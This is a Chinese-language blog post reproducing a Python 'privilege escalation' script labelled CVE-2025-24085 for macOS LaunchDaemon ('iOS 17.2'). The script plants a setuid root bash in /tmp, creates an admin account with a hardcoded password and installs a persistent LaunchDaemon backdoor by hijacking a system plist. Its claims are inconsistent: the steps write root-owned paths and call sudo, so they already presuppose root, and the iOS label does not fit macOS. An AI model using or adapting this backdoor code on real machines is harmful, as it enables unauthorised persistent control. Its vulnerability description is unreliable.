macOS LaunchDaemon权限提升漏洞分析与利用

本文详细分析了macOS LaunchDaemon在iOS 17.2中的权限提升漏洞(CVE-2025-24085),包含完整的Python利用代码,通过劫持系统守护进程配置实现root权限获取,涉及payload创建、plist文件篡改等技术细节。

macOS LaunchDaemon iOS 17.2 权限提升漏洞

风险等级: 中等
本地利用:
远程利用:
CVE编号: CVE-2025-24085
CWE编号: CWE-264

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100

#!/usr/bin/env python3
# 漏洞标题:macOS LaunchDaemon iOS 17.2 - 权限提升
# 作者:Mohammed Idrees Banyamer (@banyamer_security)
# GitHub:https://github.com/mbanyamer
# 日期:2025-05-31
# 测试环境:macOS Sonoma (14.x ARM64 / x86_64)
# CVE:CVE-2025-24085
# 类型:本地权限提升
# 平台:macOS
# 作者国家:约旦
# 描述:
# 此本地权限提升漏洞利用利用存在漏洞的macOS LaunchDaemon plist配置,
# 以root权限执行任意命令。该漏洞利用创建root payload脚本,添加root shell二进制文件,
# 创建管理员用户,并安装持久的LaunchDaemon后门以获取root访问权限。
# 它劫持com.apple.securemonitor LaunchDaemon plist来触发payload,
# 允许在macOS Sonoma系统上未经授权提升至root权限。

import os
import plistlib
import time
from pathlib import Path

LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] 创建root payload脚本...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# 添加管理员用户
sysadminctl -addUser pentest -password macOS123! -admin

# 日志文件
echo "[+] Root后门在 $(date) 触发" >> /tmp/.rootlog

# 持久化后门
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] 劫持LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # 创建伪造的plist
        print("[*] 为漏洞利用创建伪造的LaunchDaemon plist...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # 劫持现有的plist
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

def trigger_payload():
    print("[+] 手动触发LaunchDaemon...")
    os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
    print("[+] 完成。现在可以执行 /tmp/.rootbash -p 获取root shell")

def main():
    if os.geteuid() == 0:
        print("[!] 您已经是root用户。无需利用。")
        return
    create_payload()
    hijack_launchdaemon()
    print("[+] 漏洞利用完成。重启或手动运行:")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    然后运行:/tmp/.rootbash -p")

if __name__ == "__main__":
    main()
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次